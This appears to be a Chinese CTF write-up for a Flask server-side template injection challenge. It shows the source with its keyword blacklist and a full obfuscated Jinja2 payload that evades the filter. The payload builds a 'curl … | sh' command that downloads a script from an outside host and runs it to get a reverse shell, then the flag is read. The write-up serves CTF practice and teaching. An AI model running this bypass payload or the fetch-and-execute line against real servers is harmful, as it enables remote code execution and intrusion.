源码如下,过滤了不少,过滤不区分大小写:
[
'\t', ' ', "'", '"', '_', 'getitem', 'request', 'popen', 'cookies', 'args', 'class',
'mro', 'bases', 'subclasses', 'read', 'globals', 'init', '.', 'eval', 'import',
'system', 'builtins', 'os', 'pop', '[', 'form'
]
09:22:26_@out:~# cat /app/app.py
from flask import Flask
from flask import request, render_template_string, render_template
app = Flask(__name__)
def waf(name):
black_list = ['\t', ' ', "'", '"', '_', 'getitem', 'request', 'popen', 'cookies', 'args', 'class', 'mro', 'bases', 'subclasses', 'read', 'globals', 'init', '.', 'eval', 'import', 'system', 'builtins', 'os', 'pop', '[', 'form']
for black in black_list:
if black in name.lower():
name = black + " in blacklist"
break
return name
@app.route("/")
def index():
return render_template("index.html")
@app.route("/login", methods=['POST'])
def login():
username = request.form.get('username')
template = '''
{%% block body %%}
Hello
%s
{%% endblock %%}
''' % (waf(username))
return render_template_string(template)
if __name__ == "__main__":
app.run(host='0.0.0.0', port=8080)
09:22:41_@out:~#
payload:
POST /login HTTP/1.1
Host: xxx.node4.buuoj.cn:81
Content-Length: xxxx
Content-Type: application/x-www-form-urlencoded
Connection: close
username={%set%0crdea=dict(re=a,ad=a)|join%}{%set%0cpone=dict(po=a,p=a,e=a,n=a)|join%}{%set%0cget=dict(get=a)|join%}{%set%0cso=dict(o=a,s=a)|join%}{%set%0copp=dict(po=a,p=a)|join%}{%set%0cindex=dict(index=a)|join%}{%set%0cn=dict(n=a)|join%}{%set%0cu=dict(u=a)|join%}{%set%0cthree=(lipsum|string|list)|attr(index)(n)%}{%set%0ctwo=(lipsum|string|list)|attr(index)(u)%}{%set%0cone=three-two%}{%set%0cfive=three%2btwo%}{%set%0csix=three*two%}{%set%0cfou=five-one%}{%set%0cnine=three*three%}{%set%0cunderline=(lipsum|string|list)|attr(opp)(two*nine)%}{%set%0cgbl=(underline,underline,dict(glob=a,als=a)|join,underline,underline)|join%}{%set%0cspace=(lipsum|string|list)|attr(opp)(nine)%}{%set%0cc=dict(chr=a)|join%}{%set%0cgetIT=(underline,underline,dict(getit=a,em=a)|join,underline,underline)|join%}{%set%0cbul=(underline,underline,dict(builtin=a,s=a)|join,underline,underline)|join%}{%set%0cbuii=lipsum|attr(gbl)|attr(getIT)(bul)%}{%set%0cshiz=five*nine%}{%set%0cjian=buii|attr(get)(c)(shiz)%}{%set%0cshuxian=buii|attr(get)(c)(five*five*five-one)%}{%set%0cxiangang=buii|attr(get)(c)(shiz%2btwo)%}{%set%0cfanxian=buii|attr(get)(c)(two*shiz%2btwo)%}{%set%0cdot=buii|attr(get)(c)(shiz%2bone)%}{%set%0cyinghao=buii|attr(get)(c)(shiz-six)%}{%set%0caa=dict(curl=a)|join%}{%set%0cab=dict(xss=a)|join%}{%set%0cpt=dict(pt=a)|join%}{%set%0caaaa=dict(aaaa=a)|join%}{%set%0ctr=dict(tr=a)|join%}{%set%0cd=dict(d=a)|join%}{%set%0cr=dict(r=a)|join%}{%set%0csh=dict(sh=a)|join%}{%set%0ccmd=(aa,space,ab,dot,pt,xc,xiangang,aaaa,shuxian,tr,space,jian,d,space,yinghao,fanxian,r,yinghao,shuxian,sh)|join%}{{cmd}}{{lipsum|attr(gbl)|attr(get)(so)|attr(pone)(cmd)|attr(rdea)()}}&password=2
Hello
curl xss.pt/aaaa|tr -d '\r'|sh
反弹成功后,查看flag:
09:29:08_@out:~# set|grep FLAG
FLAG='Dest0g3{06237dfa-6a6e-4ab3-8309-e7688723c4c2}'
09:29:16_@out:~# cat /flag
Dest0g3{06237dfa-6a6e-4ab3-8309-e7688723c4c2}
09:29:20_@out:~#